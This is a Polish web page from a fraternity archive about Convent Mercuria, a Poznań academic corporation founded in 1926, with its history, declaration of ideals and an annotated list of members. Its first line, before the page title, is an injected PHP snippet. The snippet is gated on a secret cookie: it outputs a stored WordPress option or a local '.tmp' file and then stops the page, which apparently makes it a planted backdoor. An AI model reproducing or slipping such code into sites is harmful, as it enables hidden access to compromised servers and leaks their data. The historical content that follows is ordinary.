if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Mercuria

Dekiel Bronisława Maissnera. Nazwa:
Convent Mercuria - Korporacja Akademicka w Poznaniu
Siedziba:
Poznań
Data powstania:
13 X 1926 r.
Barwy:
czarna - błękitna - złota (symbolika barw: potęga życia, wierność idei, szczera przyjaźń
Dewiza:
„Semper fidelis” (”Zawsze wierny”)

Rys historyczny

Komers II-lecia Mercurii w Bazarze, Poznań 27 X 1928 r.

Mercurię założono dnia 13 X 1926 r. Skupiała głównie słuchaczy Wyższej Szkoły Handlowej. Korporacja za główny cel stawiała wychowywanie “świadomych swych zadań obywateli Rzeczypospolitej” poprzez “przygotowanie zawodowe oraz codzienny systematyczny wysiłek”.

Pieczęć Mercurii z podpisem Ojca Korporacji Leopolda Hebdy, 1938 r.

W deklaracji ideowej korporacji napisano: “Mercuryta, zgodnie z dewizą Korporacji ’semper fidelis’, przez życie całe wiernie trwa przy zasadach przez nią głoszonych. W postępowaniu swoim Mercuryta kieruje się wyłącznie dobrem Narodu i Państwa, jako całości, a krzewienie haseł miłości Ojczyzny - uważa za najpierwszy swój obowiązek. Drogę do potęgi i rozwoju mocarstwowego Rzeczypospolitej widzi Mercuryta w wytężonej, codziennej pracy dla Niej, dokonywanej w atmosferze pokoju; w obronie jednak nienaruszalności stanu posiadania Ojczyzny, gotów jest na pierwsze Jej wezwanie oddać życie i krew, tak, jak stale oddawać winien gorliwą pracę całego swego żywota. (…) We wszystkich swych poczynaniach w pracy obywatelskiej i zawodowej, jako też i w życiu prawatnem, Mercuryta kieruje się nakazami wysoko pojętej etyki. Za najdoskonalsze źródło wszelkich nakazów etycznych, Mercuryta uznaje naukę Chrystusową. Ponad wszystkie dobra, Mercuryta stawia - obok Boga i Ojczyzny - honor i godność ludzką. Mercuryta zawsze i wszędzie postępuje tak, by nie przynieść ujmy godności i honorowi swemu, a niemniej swej Korporacji, ani też nie naruszyć honoru i godności osobistej innych. W razie potrzeby - poczytuje sobie za obowiązek obronę kobiet i osób słabszych.”

Uroczystości X-lecia Mercurii w auli WSH, Poznań 31 I 1937 r.

Od dnia 17 III 1927 r. decyzją Poznańskiego Koła Międzykorporacyjnego Mercuria została przyjęta jako członek nadzwyczajny do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 17 III 1927 r.). Kandydowała pod opieką K! Posnania. Prawa członka rzeczywistego Związku uzyskała w grudniu 1928 r., a członka rzeczywistego-zwyczajnego dnia 8 IX 1929 r. W latach 1933-1939 pozostawała poza jego strukturami.

Uroczystości poświęcenia sztandaru Mercurii, Poznań 26 X 1929 r.

Mercuria była najstarszą korporacją afiliowaną przy Wyższej Szkole Handlowej. Dnia 26 X 1929 r. poświęcono sztandar korporacji. Z okazji V-lecia Mercurii ukazał się księga pamiątkowa “Convent Mercuria. Korporacja Akademicka w Poznaniu 1926 - 13.X. - 1931″ (Poznań 1931 r.).

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 137 nazwisk, w tym 21 członków honorowych.

Zjazd Merkurytów, Poznań 1956 r.

W okresie powojennym, o ile wiadomo, odbyły się dwa zjazdy Mercurii w Poznaniu w związku z obchodami 30. oraz 40. rocznicy powstania Akademii Ekonomicznej w 1956 r. oraz 1966 r. Ponadto Merkuryci spotykali się w małych grupach w Poznaniu i w Warszawie.

Lista członków

Poniższa, niekompletna lista członków Mercurii obejmuje sto kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Adam Ballenstedt, (1 października 1880 w Poznaniu - 9 października 1942 w Krakowie), ojciec Ludwika (Montana), inż. architekt, zaprojektował m.in. gmach główny poznańskiej WSH (obecnie Uniwersytet Ekonomiczny w Poznaniu), Filister honorowy Mercurii,
 2. Tadeusz Drzażdżyński, (26 września 1888 w Głubczycach - 19 stycznia 1935 we Wrocławiu) dr iur., ziemianin, właściciel maj. Piotrowo, dyrektor Związku Zachodnio-Polskiego Przemysłu Cukrowniczego, naczelny dyrektor Organizacji Zjednoczonego Przemysłu i Rolnictwa Zachodniej Polski w Poznaniu, honorowy konsul węgierski, Filister honorowy Mercurii, ożenił się z Janiną Kotarską, mieli dwójkę dzieci Jerzego i Elżbietę, pochowany na Cmentarzu św. Piotra i Pawła w Gnieźnie

  Kazimierz Dzierżanowski, 1928 r.

 3. Kazimierz Dzierżanowski, (24 października 1872 w Hałuszyńcach w pow. skałackim w woj. tarnopolskim - maj 1940 na Ukrainie), s. Zygmunta i Marii z Fedorowiczów, absolwent Wydziału Artylerii Wojskowej Akademii Technicznej w Wiedniu, zawodowy oficer austriackiej artylerii, ppłk 1918, od 1918 w WP, zastępca Generalnego Inspektora Artylerii 1919-22, dowódca Okręgu Korpusu Nr III w Grodnie 1926-27, dowódca Okręgu Korpusu Nr VII w Poznaniu 1927-32, od 1932 w stanie spoczynku, gen. dywizji WP, Filister honorowy Mercurii, w 1939 aresztowany we Lwowie, prawd. zmarł w więzieniu w Kijowie, odznaczony m.in. Orderem Virtuti Militari, czterokrotnie Krzyżem Walecznych, Krzyżem Komandorskim OOP, belgijskim Krzyżem Wielkiego Oficera Orderu Leopolda

  Leonard Glabisz, 1928 r.

 4. Leonard Glabisz, (1871-1951), brat Józefa, stryj Władysława (obaj Icaria), prof. i pierwszy dyrektor 1926-30 WSH, Ojciec Korporacji Mercuria, Filister honorowy Icarii (?)

  Leopold Hebda, lata 30-te.

 5. Leopold Hebda, (1877-1940), dr, bankowiec, wieloletni prezes Zarządu Banku Cukrownictwa w Poznaniu, Filister honorowy i II-gi Ojciec Mercurii, członek honorowy Palestrii

 6. Julian Hubert, (1889-1974), prof. UP i WSH, wicestarosta krajowy, Filister honorowy Mercurii

  Bohdan Jarochowski, 1928 r.

 7. Bohdan Jarochowski, (25 kwietnia 1888 w Warszawie - 28 października 1936 w Poznaniu), dziennikarz, absolwent prawa UJ, po studiach dziennikarz “Gazety Porannej”, sekretarz red. “Słowa Polskiego”, publicysta “Gazety Powszechnej”, od 1927 red., od 1933 red. naczelny “Kuriera Poznańskiego”, prezes Syndykatu Dziennikarzy Wielkopolski i Pomorzu 1922-27, członek Zarządu Głównego Związku Zawodowego Dziennikarzy RP w Warszawie, sekretarz i prezes Towarzystwa Polsko-Czechosłowackiego, radny miejski w Poznaniu 1933-36, Filister honorowy Mercurii, pochowany w grobowcu Jarachowskich w Warszawie

 8. Witold Jeszke, (1891 w Ruchocinku k. Witkowa - 1970 w Poznaniu), s. Bolesława i Katarzyny z Sułtczyńskich, dr praw, adwokat i notariusz, poseł i senator, w czasie II wojny światowej żołnierz Zapasowej Brygady Karpackiej, Filister honorowy Mercurii, po wojnie na emigracji w Wielkiej Brytanii, wrócił do kraju w 1961
 9. Kazimierz Krasicki, dyrektor PKO o/Poznań, prokurent Banku Związku Spółek Zarobkowych o/Wilno, Filister honorowy Mercurii
 10. Władysław Miśkiewicz, dyrektor Komunalnej Kasy Oszczędności Miasta Poznania, Filister honorowy Mercurii

  Ignacy Niedbał, 1929 r.

 11. Ignacy Niedbał, przemysłowiec, konsul honorowy Łotwy, Filister honorowy Mercurii, fundator sztandaru korporacji

 12. Bolesław Olszewicz, (5 stycznia 1893 w Warszawie - 24 stycznia 1972 we Wrocławiu), s. Adolfa i Reginy z Zweigbaumów, geograf, historyk geografii i kartografii, bibliotekarz, prof. i pierwszy dyrektor Biblioteki WSH, doktorat UP 1933, Filister honorowy Mercurii, kustosz Biblioteki UW 1933-39, od 1946 prof. UWr., współzałożyciel Polskiego Towarzystwa Geograficznego, członek Międzynarodowej Akademii Historii Nauki w Paryżu, współautor i redaktor pracy “Dziewięć wieków geografii polskiej. Wybitni geografowie polscy” (Warszawa 1967), pochowany na Cmentarzu Ewangelicko-Reformowanym w Warszawie
 13. Adam Pachoński, ( - lipiec 1932) dr, dyrektor poznańskiego Oddziału Banku Gospodarstwa Krajowego, Filister honorowy Mercurii
 14. Antoni Peretiatkowicz, (13 czerwca 1884 w maj. rodzinnym Boruchów k. Łucka - 18 grudnia 1956 w Poznaniu) z rodziny ziemiańskiej, s. Aurelego i Jadwigi z Nemekszów, absolwent Gimnazjum w Kamieńcu Podolskim 1902, studiował prawo w Warszawie (w 1905 aresztowany za udział w demonstracjach, po zwolnieniu zmuszony do kontynuowania studiów za granicą), Berlinie, Lwowie, Krakowie, dr prawa UJ 1909, konstytucjonalista, kontynuował studia w Paryżu, Genewie i Heidelbergu, działacz Związku Młodzieży Polskiej “Zet”, habilitacja UJ 1914, doc. prywatny i prof. nadzw. UJ, prof. zw. i dziekan Wydziału Prawa Uniwersytetu Lubelskiego 1918-19, prof. UP 1919-39 i 1945-56, organizator i pierwszy dziekan Wydziału Prawa UP, rektor UP 1936-39, dyrektor WSH 1930-38 i rektor AH 1938-39, Filister honorowy Mercurii, od 1937 członek Trybunału Kompetencyjnego, a od 1939 sędzia Najwyższego Trybunału Administracyjnego, założyciel i pierwszy red. naczelny “Ruchu Prawniczego i Ekonomicznego”, autor licznych prac z zakresu prawa konstytucyjnego, odznaczony m.in. Komandorią Orderu Legii Honorowej 1936, pochowany na Cmentarzu Górczyńskim w Poznaniu
 15. Stefan baron Ropp, (21 maja 1892 w Libawie - po 1954) s. Konstantego i Michaliny z Szadurskich, inż. metalurgii i górnictwa, ekonomista, pierwszy dyrektor Międzynarodowych Targów Poznańskich, prof. WSH, Filister honorowy Mercurii
 16. Stanisław Ruciński, (1872-1941), inż. architekt, prezes Dyrekcji Kolei Państwowych w Poznaniu, Filister honorowy Mercurii
 17. Marceli Scheffs, (1880 - 6 grudnia 1953), bankowiec, spółdzielca, autor kilkuset artykułów, głównie z dziedziny bankowości, dyrektor Banku Poznańskiego Ziemstwa Kredytowego, konsul honorowy Jugosławii, Filister honorowy Mercurii, ostatni właściciel maj. Komorniki pod Poznaniem
 18. Fryderyk Suchanek, dyrektor Firmy Hipolit Cegielski, Filister honorowy Mercurii

  Stanisław Szulc, 1928 r.

 19. Stanisław Szulc, (1887-1962), zegarmistrz, jubiler, działacz gospodarczy, radca Izby Przemysłowo Handlowej w Poznaniu, ofiarował WSH łańcuch rektorski i prorektorski, Filister honorowy Mercurii

 20. Michał Walczak, z Ostrowa Wlkp., przemysłowiec, Filister honorowy Mercurii

  Jan Zakrzewski, 1928 r.

 21. Jan Zakrzewski, prezes Sądu Apelacyjnego w Poznaniu, Filister honorowy Mercurii

Członkowie rzeczywiści

 1. Michał Anczykowski, (23 sierpnia 1907 w Ostrowie Wielkopolskim - ) s. Franciszka, absolwent Gimnazjum w Poznaniu, student WSH, wiceprezes 1930/31
 2. Jan Badowski, (ur. w Łodzi) absolwent Gimnazjum w Łodzi, student WSH
 3. Stefan Banaszak, student WSH
 4. Telesfor Banaszkiewicz,
 5. Henryk Bartkowiak, student UJK
 6. Antoni Bauer, sekretarz 1934
 7. Henryk Binder,
 8. Feliks Biniak, student WSH
 9. Ludwik Błażczak, (1907 w Berlinie - 1991) absolwent Gimnazjum w Poznaniu, student WSH, sekretarz 1933, marszałek 1934/35, członek Zarządu Bratniej Pomocy WSH 1931/32 i 1932/33
 10. Andrzej Błądek,
 11. Zbigniew Bobowski, członek Zarządu Bratniej Pomocy AH 1939
 12. Leon Bruskiewicz,
 13. Stanisław Buchwald, student WSH, sekretarz 1933/34, kanclerz 1935/36
 14. Wacław Bukczyński, (ur. Poznań - ), absolwent Gimnazjum w Bydgoszczy, student WSH
 15. Jan Burda, student WSH, skreślony
 16. Kazimierz Cegłowski,
 17. Władysław Czarnecki, ? (według przekazu ustnego miał należeć do Mercurii)
 18. Alfred Czekalski, (1915 - po 2005)

  Tadeusz Czerwiński, ok. 1929 r.

 19. Tadeusz Czerwiński, (10 września 1904 w Ozorkowie w woj. łódzkim - 7 grudnia 1933 w Poznaniu) absolwent Gimnazjum w Łęczycy, student i absolwent WSH 1926-32, założyciel Mercurii, prezes sem. let. 1927/28 (od maja), olderman 1928/29, 1929/30, 1933/34, członek Komitetu Organizacyjnego I Kongres ZPKA, redaktor Księgi V-lecia Mercurii, współorganizator i działacz Bratniej Pomocy WSH, wiceprzewodniczący sądu apelacyjnego w Bratniej Pomocy, po studiach pracownik poznańskiego oddziału Banku Gospodarstwa Krajowego, zginął śmiercią tragiczną (samobójstwo), pochowany na cmentarzu przy ul. Bukowskiej w Poznaniu, w 1942 zwkłoki przeniesiono na cmentarz przy ul. Samotnej w Poznaniu (zob. także Rafał Sierchuła, Tadeusz Czerwiński (1904-1933), rękopis AK)

 20. Józef Czyżykowski, członek Zarządu Bratniej Pomocy AH 1938/39
 21. Adam Dobieliński, (1906 - 1953)

  Czesław Drynkowski, ok. 1929 r.

 22. Czesław Drynkowski, (ur. Kurzjamie w woj. łódzkim - przed 1970) absolwent Gimnazjum w Łęczycy, student WSH, założyciel Mercurii, dwukrotny prezes 1928/29, 1929/30 oraz 1933/34, przewodniczący Sądu Konwentowego 1927/28 i 1930/31, członek Komitetu Organizacyjnego I Kongresu ZPKA, projektodawca statutu Mercurii

 23. Zdzisław Dulla, (ur. Kamienna w woj. łódzkim - ) absolwent Gimnazjum w Bydgoszczy, student WSH

  Zygmunt Felczak, ok. 1929 r.

 24. Zygmunt Felczak, (2 maja 1903 w Chorkach - 3 lipca 1946 w Bydgoszczy) student UP, założyciel Mercurii, prezes 1930/31, członek Komitetu Organizacyjnego I Kongres ZPKA, przewodniczący Zrzeszenia Akademickich Kół Prowincjonalnych w Poznaniu, dziennikarz, działacz polityczny Narodowej Partii Robotniczej i Stronnictwa Pracy, w czasie wojny działacz konspiracji politycznej, stopniowo przechodził na pozycje lewicowe, w 1945 wicewojewoda pomorski, od listopada 1945 wiceprezes SP i prezes Zarządu Wojewódzkiego w Bydgoszczy, od grudnia 1945 prezes klubu SP w Krajowej Radzie Narodowej, opowiedział się za głosowaniem “3 razy tak”, zmarł na marskość wątroby

 25. Włodzimierz Filipow, założyciel Mercurii
 26. Edmund Frankowski,
 27. Marian Frühauf, (ur. w Stanisławowie - ) absolwent gimnazjum w Krakowie, student WSH
 28. Edmund Gałła,
 29. Zygfryd Gawroński , student WSH, przyjęty 1935
 30. Stanisław Gidyński, przyjęty 1937
 31. Stanisław Głuszkiewicz, (ur. w Brzezinach w woj. łódzkim - ) absolwent Gimnazjum we Lwowie, student WSH, założyciel Mercurii, żołnierz III Powstania Śląskiego, drugi prezes sem. let. 1926/27, przewodniczący Sądu Konwentowego 1928-30
 32. Henryk Gross, student WSH, przyjęty 1935
 33. Wincenty Grudziński, wystąpił 1930
 34. Witold Iwicki, wystąpił 1937
 35. Witosław Janaszek, prezes 1937
 36. Wacław Jaskólski, c. ok. 1930, wystąpił 1931, kanclerz 1933
 37. Józef Jęśko, student WSH, przyjęty 1935
 38. Feliks Kalewski, (ur. w Kunowie w woj. Poznańskim - ) absolwent Gimnazjum w Jarocinie, student WSH

  Władysław Karczewski, 1928 r.

 39. Władysław Karczewski, (ur. w Pleszewie - lata 70-te) absolwent Gimnazjum w Pleszewie, student WSH, lotnik

 40. Edward Kluczyński, student WSH, skreślony
 41. Stefan Kłosowski,
 42. Karol Kolber,
 43. Kazimierz Koliński, marszałek i kanclerz 1934/35, prezes i olderman 1935/36

  Aleksander Kostecki, 1929 r.

 44. Aleksander Kostecki, (21 marca 1904 we Władywostoku - 15 lutego 1971 w miejsc. Rybienko Leśne k/Wyszkowa), herbu Dąbrowa, s. Jana Leona i Heleny z Laszkiewiczów, absolwent Gimnazjum Matematyczno-Przyrodniczego im. H. Kołłątaja w Krotoszynie 1925, student i absolwent WSH 1925-32, dzięki uzyskanemu stypendium studiował także na Uniwersytecie w Tuluzie 1926-28, referent kontraktowy w Urzędzie Skarbowym w Poznaniu 1930-35, kierownik księgowości w kopalni soli potasowej w Kałuszu w woj. stanisławowskim 1938-43, od 1943 w Hebdowie, gdzie zaangażował się w działalność konspiracyjną, po II wojnie światowej m.in. kierownik Centrali Materiałów Budowlanych w Jeleniej Górze, kierownik działu obrotu towarowego Fabryki Maszyn Papierniczych w Cieplicach, kierownik działu planowania zaopatrzenia materiałowego Zjednoczenia Budownictwa Miejskiego w Jeleniej Górze oraz kierownik działu zbytu Zakładów Porcelany Technicznej, dyrektor handlowy w Fabryce Zabawek w Jeleniej Górze 1951-54, w wyniku negatywnego nastawienia władz partyjnych zrzekł się stanowiska, następnie pracował jako robotnik w Spółdzielczym Zakładzie Malarskim, po zdaniu egzaminów czeladniczych malarz szyldowy w Wyszkowie, nauczyciel zawodu klas malarskich w Zespole Szkół Budowlanych w Wyszkowie, pracownik Fabryki Sprężyn w Wyszkowie oraz Fabryki Maszyn Budowlanych w Baczkach (Łochów) oraz działu inwestycji Browaru Wyszkowskiego, pochowany na cmentarzu w Wyszkowie n/Bugiem

 45. Mirosław Kowalski, student WSH, sekretarz 1936
 46. Aleksander Kozarzewski, student WSH

  Jan Koziciński, ok. 1929 r.

 47. Jan Koziciński, (ur.w Bodzanowie w woj. warszawskim - 1974) absolwent gimnazjum w Wąbrzeźnie, student WSH, założyciel Mercurii, sekretarz 1928/29, wiceprezes Poznańskiego Komitetu Akademickiego 1930/31

 48. Zdzisław Kozłowski, student WSH, przyjęty 1935, olderman 1937
 49. Roman Kulig,
 50. Bolesław Kurzawa, (ur. w Berlinie) absolwent Gimnazjum w Krotoszynie, student WSH
 51. Wiktor Kusza,
 52. Bolesław Kwiatkowski, c. ok. 1930, wystąpił 1931
 53. Marian Lasociński, sekretarz 1934/35
 54. Stanisław Laubert, (ur. w Mińsku Mazowieckim), absolwent gimnazjum w Bydgoszczy, student WSH, kanclerz 1933/34 przewodniczący Komisji Rewizyjnej Bratniej Pomocy WSH 1929/30
 55. Marian Łabuński, (1908 w Wyszkach na Łotwie - 1986) brat Leona (Cresovia Vilnensis), absolwent Gimnazjum w Dyneburgu, student WSH
 56. Witold Łukowski, (ur. we Lwowie - ) absolwent gimnazjum w Poznaniu, student WSH

  Bronisław Maissner, koniec lat 20-tych (?).

 57. Bronisław Maissner (po wojnie Malewski), (30 stycznia 1906 w Łodzi - 29 października 1985 w Łodzi) absolwent gimnazjum w Łodzi, student i absolwent ekonomii WSH, żołnierz AK, mjr, po wojnie pracownik “Cepelii”, dyrektor Stowarzyszenia Księgowych

 58. Jaromir Małolepszy, student WSH, przyjęty 1935
 59. Stanisław Mazurek, student WSH, przyjęty 1935
 60. Józef Mączyński,

  Celestyn Menczyński, lata 30-te (?).

 61. Celestyn Menczyński (od lat 30. Męczyński), (2 marca 1907 w Strychowie w pow. gnieźnieńskim - 11 lipca 1983 w Poznaniu) s. Juliana (rolnika) i Anastazji z d. Łaszewska, absolwent gimnazjum w Bydgoszczy, student i absolwent WSH 1929-35, przewodniczący Sądu Koleżeńskiego Bratniej Pomocy WSH, ukończył podchorążówkę w Śremie, ppor. rez., przypisany do 29. Pułku Strzelców Kaniowskich w Kaliszu, uczestniczył w wojnie obronnej 1939, w czasie okupacji w ZWZ w Radomiu, 10 marca 1943 aresztowany przez Gestapo, osadzony w obozie koncentracyjnym w Auschwitz (4 VII 1943 - 1 IX 1943), a następnie w Buchenwaldzie (23 X 1943 - 4 IV 1945), po wojnie pracował w dyrekcji Przemysłu Miejscowego, wicedyrektor Poznańskiego Zjednoczenia Przemysłu Miejscowego, dyrektor Przedsiębiorstwa Krawiecko-Kuśnierskiego “Roksana”, pracownik Zakładu Doskonalenia Zawodowego, organizator trzech zjazdów Mercurii I w październiku 1956, II w październiku 1966 oraz III w październiku 1976, odznaczony Krzyżem OOP, Krzyżem Poznania, pochowany na poznańskim Miłostowie [Źródła (poza wskazanymi poniżej spisu członków): relacja córki Marii Męczyńskiej oraz wnuka Michała Krzysztofa Męczyńskiego]

 62. Jan Mierzwiak, (ur. w Kępnie) absolwent Gimnazjum w Ostrowie Wlkp., student WSH
 63. Bohdan Mrówczyński, (ur. w Rawiczu - ) absolwent Gimnazjum w Ostrowie Wlkp., student WSH, skarbnik Bratniej Pomocy WSH 1929/30, prezes Koła Ostrowian 1930
 64. Henryk Nickel, student UP, przyjęty 1933
 65. Anicet Niedziela, student WSH
 66. Eugeniusz Nimkiewicz, student WSH, przyjęty 1933
 67. Napoleon Nitecki,
 68. Stanisław Nowacki,
 69. Romuald Oborski,
 70. Marian Panka,
 71. Kazimierz Patan, student WSH, przyjęty 1935, skreślony 1939
 72. Jan Jerzy Petrykowski, (8 września 1912 - 11 lipca 1970) s. Józefa, student WSH, w czasie okupacji wraz z Ojcem i bratem prowadził aptekę w Kazimierzu nad Wisłą
 73. Leszek Piasecki, (ur. we Lwowie - ) absolwent Gimnazjum w Środzie, student WSH
 74. Konstanty Pilawski, (ur. w Winnicy na Wołyniu - ), absolwent Gimnazjum w Krzmieńcu na Wołyniu, student UP
 75. Michał Pliszka, student UP
 76. Cyryl Płotka, student WSH, przyjęty 1935, marszałek 1937
 77. Leon Poćwiardowski, (ur. w Lubiewie w woj. pomorskim - ) absolwent gimnazjum w Bydgoszczy, student WSH
 78. Konrad Polcyn,
 79. Jerzy Przybylski, student WSH, przyjęty 1937
 80. Alfons Przybyła, prezes 1934/35, marszałek 1935/36
 81. Bernard Przybyła, przyjęty 1936
 82. Leon Przywarski, c. ok. 1930, wystąpił 1931
 83. Bolesław Psuja, c. ok. 1930, wystąpił 1931
 84. Paweł Radke,
 85. Alfred Richter,
 86. Czesław Rutkowski,
 87. Julian Skaza, sekretarz 1937
 88. Kazimierz Skrzypiec, przyjęty 1936
 89. Smułczyński, skreślony 1937
 90. Lubomir Smyczyński, (ur. we Wrocławiu - ) brat stryjeczny Zdzisława (Lechia) i Zbigniewa (Magna-Polonia), absolwent gimnazjum w Poznaniu, student WSH i UJ, założyciel Mercurii, pierwszy sekretarz sem. zim. 1926/27, sekretarz sem. let. 1926/27 i sem. zim. 1927/28, olderman sem. let. 1927/28 oraz sem. sem. let. 1927/30, wiceprezes sem. zim. 1929/30, prawnik, adwokat, kynolog, m.in. autor ksiązki “Psy, rasy i wychowanie”
 91. Witold Sroczyński, (1908 w Lubaszu w woj. poznańskim - 1994) absolwent gimnazjum w Poznaniu, student i absolwent ekonomii WSH, przyjęty 1928, prezes 1931/32 i 1934/35, prezes Koła Naukowego WSH 1930/31, członek Komisji Rewizyjnej Wydziału Kół Ekonomicznych i Handlowych OZAKN 1932/33
 92. Józef Sternicki, ( - 1933)
 93. Henryk Suchanek, założyciel Mercurii, wiceprezes sem. zim. 1926/27
 94. Edward Sundman, (ur. w Grzebienisku w pow. poznańskim) absolwent Gimnazjum w Szamotułach, student WSH
 95. Stefan Szałowski, (ur. w Wiedniu - ) absolwent gimnazjum w Poznaniu, student WSH, sekretarz 1930/31, marszałek 1934/35
 96. Juliusz Szawdyn, (1909 w Dyneburgu - 1988) absolwent gimnazjum w Dyneburgu, student WSH, przewodniczący Komisji Rewizyjnej Koła Naukowego WSH 1930
 97. Jerzy Szczepański,
 98. Mieczysław Szczytowski, student UP, przyjęty 1933
 99. Roman Sznitzer, student UP, założyciel Mercuria
 100. Antoni Szulc,
 101. Kazimierz Świtalski, student WSH, sekretarz 1935/36
 102. Ignacy Tabako, wystąpił 1931
 103. Tasarek,
 104. Jerzy Tomaszewski, założyciel Mercurii, prezes sem. zim. 1926/27
 105. Wacław Tuliszkiewicz, skarbnik 1937
 106. Eugeniusz Wagner,
 107. Mikołaj Wagner, (ur. w Białowieży - ) absolwent gimnazjum w Bdgoszczy, student WSH

  Karol Wilak, ok. 1929 r.

 108. Karol Wilak, (ur. w Poznaniu - ok. 1954) absolwent gimnazjum w Poznaniu, student WSH

 109. Roman Wiśniewski, (ur. w Grabinie - ) absolwent Gimnazjum w Bydgoszczy, student WSH, sekretarz Bratniej Pomocy WSH 1929/30
 110. Adam Wize,
 111. Alfons Wolnikowski,
 112. Albin Wypijewski, kanclerz 1937, członek Komisji Rewizyjnej Bratniej Pomocy AH 1938/39
 113. Andrzej Zabel, c. ok. 1930, wystąpił 1931
 114. Jerzy Zarzycki, (ur. w Zamościu - ) absolwent Gimnazjum w Tomaszowie Lubelskim, student UP, założyciel Mercurii, wiceprezes 1928/29
 115. Witalis Zielenkowicz, (ur. w Poznaniu - ) student WSH, olderman 1930/31, olderman 1933/34
 116. Borys Żaba, (1907 w Warszawie - 1979) absolwent gimnazjum w Ostrowie Mazowieckiej, student WSH, pochowany na Powązkach

Strona tytułowa Księgi V-lecia Mercurii, Poznań 1931 r.

Listę członków opracowano na podstawie:

1) Convent Mercuria. Korporacja Akademicka w Poznaniu 1926 - 13.X. - 1931, Poznań 1931 (”Księga V-lecia Mercurii”),
2) L. Ter-Oganjan (uzupełnienie K. A. Tyszka), Lista członków Polskiej Korporacji Akademickiej Conventu Mercuria (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 112 i n.,
3) materiałów archiwalnych z Archiwum UAM,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Mercuria.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 20 VII 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Convent Mercuria - Korporacja Akademicka w Poznaniu, (na:) www.archiwumkorporacyjne.pl, stan 20 VII 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }